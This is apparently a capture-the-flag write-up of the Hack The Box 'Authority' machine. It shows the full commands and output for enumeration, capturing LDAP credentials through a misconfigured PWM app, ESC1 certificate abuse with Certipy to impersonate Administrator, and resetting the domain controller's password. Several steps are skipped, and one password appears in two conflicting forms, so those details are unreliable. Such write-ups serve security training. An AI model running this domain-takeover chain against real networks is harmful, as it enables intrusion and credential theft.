Authority is a medium-difficulty Windows machine that highlights the dangers of misconfigurations, password reuse, storing credentials on shares, and demonstrates how default settings in Active Directory (such as the ability for all domain users to add up to 10 computers to the domain) can be combined with other issues (vulnerable AD CS certificate templates) to take over a domain.
Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
8443/tcp open https-alt
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nmap -p53,80,88,135,139,389,445,8443 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Active Directory LDAP (Domain: authority.htb)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2024-11-09T16:43:18+00:00; +4h00m00s from scanner time.
445/tcp open microsoft-ds?
636/tcp open ldapssl
8443/tcp open ssl/https-alt
..snip..
Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-time:
| date: 2024-11-09T16:43:10
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Summary
* Open ports: 53,80,88,135,139,389,445,8443
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - RPC - SMB - KERBEROS - LDAP
* Important notes: Domain: authority.htb
After discovering open ports and updating /etc/hosts file, I will move to enumerate the services running one by one.
HTTP Enumeration
Visiting http://authority.htb/ shows me normal IIS webpage
When I tried to fuzz the website, I didn't get anything for both directories and files, So I will move to webapp at 8443 port
When I visit the site at http://authority.htb:8443/, It tells me it needs TLS, So I will try access it using https
When I visit the same URL but with https, I'm redirected to https://authority.htb:8443/pwm/private/login
This message states that the Webapp is in Configuration mode which allows updating the configuration without LDAP authentication
There are also two buttons here and both of them leading to the same page
I can see LDAP distinguished name here with username of svc_pwm and DC of htb.corp
When I tried to authenticate with *:* (for ldap injection testing), I get this error that reveals another username svc_ldap. Also, I get the same error using any other credentials
From here, I can't do many things, So I will move to other services (SMB, Kerberos, ..etc)
Kerberos Enumeration
Unluckily, this user can't be asrepoasted
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $impacket-GetNPUsers authority.htb/svc_ldap@10.10.11.222 -no-pass -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for svc_ldap@10.10.11.222
[-] User svc_ldap@10.10.11.222 doesn't have UF_DONT_REQUIRE_PREAUTH set
SMB & RPC Enumeration
No data from RPC
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c enumdomgroups
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
Here I can see I have READ access on Development share
There are several files in this share but with no use and I can see ADCS folder, So It might be indicator to PKI existence
I run the command and it asked for a password, So I supplied Welcome1 (found before) as a password but it gave me this error
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible-vault decrypt main.yml
Vault password:
ERROR! input is not vault encrypted data. /home/kali/HackTheBox/platform/machines/Authority/main.yml is not a vault encrypted file for /home/kali/HackTheBox/platform/machines/Authority/main.yml
I released I made something wrong which is I should get the hashes of these secrets and crack them to get the correct password
I released that it's dead end because svc_pwn can't authenticate to ldap, either. I will try the credential to the webapp on 8443 port.
The password worked on Configuraiton Manager tab only not the main login-form
Under Confgiuration Editor, there is Connection tab that has several field and I can see that svc_ldap user's credentials is stored on the server and connect to ldaps://authority.authority.htb:636, So If I change this value to my host's IP, I can get the credentials.
And then click on Test LDAP Profile
svc_ldap:htblDaP_1n_th3_cle4r!
Now I have valid domain account, access to winRM and know that ADCS exists.
Since ADCS exists, I will check for vulnerable templates with Certipy
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy find -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -vulnerable -stdout
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
..snip..
Template Name : CorpVPN
Display Name : Corp VPN
Certificate Authorities : AUTHORITY-CA
..snip..
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
Domain Computers can abuse ESC1 to get domain admins privileges by specifing "subject alternative name" to privileged user in the domain (Administrator) and I can create one if the machine account qoute is not set to Zero.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy req -u 'blind0bandit$@authority.htb' -p 'blind0bandit@@!!!@@' -ca AUTHORITY-CA -template CorpVPN -upn administrator@authority.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.222
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
I get KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type) that means PKINIT authentication is not implemented, but fortunately Certipy has -ldap-shell option
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.222 -ldap-shell
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Connecting to 'ldaps://10.10.11.222:636'
[*] Authenticated to '10.10.11.222' as: u:HTB\Administrator
Type help for list of commands
# change_password 'authority$'
Got User DN: CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb
Attempting to set new password of: X!xJ#)>|HFPi";;
Password changed successfully!
I changed the password of the dc machine account to instead of administrator to minimize the damage
